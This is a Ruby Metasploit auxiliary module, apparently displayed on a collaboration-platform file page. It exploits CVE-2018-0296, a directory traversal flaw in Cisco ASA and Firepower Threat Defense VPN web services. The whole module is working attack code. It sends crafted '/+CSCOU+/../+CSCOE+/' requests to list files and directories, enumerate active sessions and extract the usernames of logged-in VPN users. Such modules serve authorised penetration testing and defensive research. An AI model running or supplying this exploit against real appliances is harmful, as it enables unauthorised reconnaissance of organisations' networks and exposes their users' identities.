Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7

8
  include Msf::Exploit::Remote::HttpClient
9

10
  def initialize(info = {})
11
    super(update_info(info,
12
      'Name'           => 'Cisco ASA Directory Traversal',
13
      'Description'    => %q{
14
        This module exploits a directory traversal vulnerability in Cisco's Adaptive Security Appliance (ASA) software and Firepower Threat Defense (FTD) software.
15
        It lists the contents of Cisco's VPN web service which includes directories, files, and currently logged in users.
16
      },
17
      'Author'         => [ 'Michał Bentkowski',  # Discovery
18
                            'Yassine Aboukir',    # PoC
19
                            'Shelby Pace'         # Metasploit Module
20
                          ],
21
      'License'        => MSF_LICENSE,
22
      'References'     => [
23
                           [ 'CVE', '2018-0296' ],
24
                           [ 'EDB', '44956' ]
25
                          ],
26
      'DisclosureDate' => '2018-06-06'
27
    ))
28

29
    register_options(
30
      [
31
        OptString.new('TARGETURI', [ true, 'Path to Cisco installation', '/' ]),
32
        OptBool.new('SSL', [ true, 'Use SSL', true ]),
33
        Opt::RPORT(443)
34
      ])
35
  end
36

37
  def is_accessible?
38
    uri = normalize_uri(target_uri.path, '+CSCOE+/logon.html')
39

40
    res = send_request_cgi(
41
      'method'  =>  'GET',
42
      'uri'     =>  uri
43
    )
44

45
    return (res && (res.body.include?("SSL VPN Service") || res.body.include?("+CSCOE+") || res.body.include?("+webvpn+") || res.body.include?("webvpnlogin")))
46
  end
47

48
  def list_files(path)
49
    uri = normalize_uri(target_uri.path, path)
50

51
    list_res = send_request_cgi(
52
      'method'  =>  'GET',
53
      'uri'     =>  uri
54
    )
55

56
    if list_res && list_res.code == 200
57
      if list_res.body.match(/\/{3}sessions/)
58
        get_sessions(list_res.body)
59
      else
60
        print_good(list_res.body)
61
      end
62
    end
63
  end
64

65
  def get_sessions(response)
66
    session_nos = response.scan(/([0-9]{2,})/)
67

68
    if session_nos.empty?
69
      print_status("Could not detect any sessions")
70
      print("\n")
71
      return
72
    end
73

74
    print_good(response)
75
    list_users(session_nos)
76
  end
77

78
  def list_users(sessions)
79
    sessions_uri = '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/'
80
    user_ids = Array.new
81

82
    sessions.each do |session_no|
83
      users_res = send_request_cgi(
84
        'method'  =>  'GET',
85
        'uri'     =>  normalize_uri(target_uri.path, sessions_uri, session_no)
86
      )
87

88
      if users_res && users_res.body.include?('name')
89
        user_ids.push(users_res.body.match(/user:(\w+)/).to_s)
90
      end
91
    end
92

93
    unless user_ids.empty?
94
      print_status('Users logged in:')
95
      user_ids.each { |id| print_good(id) }
96
      print("\n")
97
      return
98
    end
99

100
    print_status("There are no users logged in currently")
101
  end
102

103
  def run
104
    file_uri = '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/'
105
    sessions_uri = '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/'
106
    cscoe_uri = '/+CSCOU+/../+CSCOE+/files/file_list.json?path=%2bCSCOE%2b'
107

108
    paths = [file_uri, sessions_uri, cscoe_uri]
109

110
    unless is_accessible?
111
      fail_with(Failure::NotFound, 'Failed to reach Cisco web logon service')
112
    end
113

114
    paths.each { |path| list_files(path) }
115
  end
116
end
117

118